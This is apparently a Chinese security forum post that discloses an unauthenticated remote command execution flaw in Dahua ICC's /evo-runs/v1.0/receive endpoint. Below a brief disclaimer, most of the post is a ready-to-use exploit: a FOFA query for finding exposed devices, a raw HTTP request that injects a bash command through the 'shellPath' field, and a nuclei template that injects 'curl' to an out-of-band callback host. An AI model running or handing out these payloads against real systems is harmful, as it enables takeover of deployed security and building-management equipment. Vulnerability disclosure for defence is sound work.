receive RCE

勾八

1个月前发布

410

免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述：

大华icc /evo-runs/v1.0/receive 接口存在远程命令执行漏洞

影响版本：

大华icc

FOFA:

icon_hash="-1935899595"

POC：

POST /evo-runs/v1.0/receive HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 249
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/41.0.2224.3 Safari/537.36
X-Subject-Headerflag: ADAPT

{
 "method": "agent.ossm.mapping.config",
 "info": {
 "configure": "abcd",
 "filePath": "haha",
 "paramMap": {
 "shellPath": "/bin/bash -c df>/opt/evoWpms/static/macvguun.txt",
 "filePath": "abc"
 },
 "requestIp": ""
 }
}

将df命令执行的结果写入macvguun.txt文件中。

nuclei POC:

id: CVE-2025-XXXXX

info:
  name: Dahua ICC evo-runsv1.0 RCE
  author: ProjectDiscoveryAI
  severity: critical
  description: |
    Dahua ICC evo-runsv1.0 contains a remote code execution vulnerability in the /evo-runs/v1.0/receive endpoint
    via the agent.ossm.mapping.config method that allows unauthenticated attackers to execute arbitrary system commands.
  reference:
    - https://www.dahuatech.com/security
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-XXXXX
    - https://cwe.mitre.org/data/definitions/78.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-78
  metadata:
    verified: true
    max-request: 1
    vendor: dahua
    product: icc-evo-runsv1.0
    fofa-query: app="Dahua-ICC"
  tags: cve,cve2025,dahua,icc,rce,oast,blind

variables:
  oast: "{{interactsh-url}}"

http:
  - raw:
      - |
        POST /evo-runs/v1.0/receive HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
        Accept: application/json, text/plain, */*
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/json
        Connection: close

        {
          "method": "agent.ossm.mapping.config",
          "info": {
            "configure": "test",
            "filePath": "test",
            "paramMap": {
              "shellPath": "curl {{oast}}",
              "filePath": "test"
            },
            "requestIp": "127.0.0.1"
          }
        }

    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - "(curl.*)"

评分

欢迎为Ta评分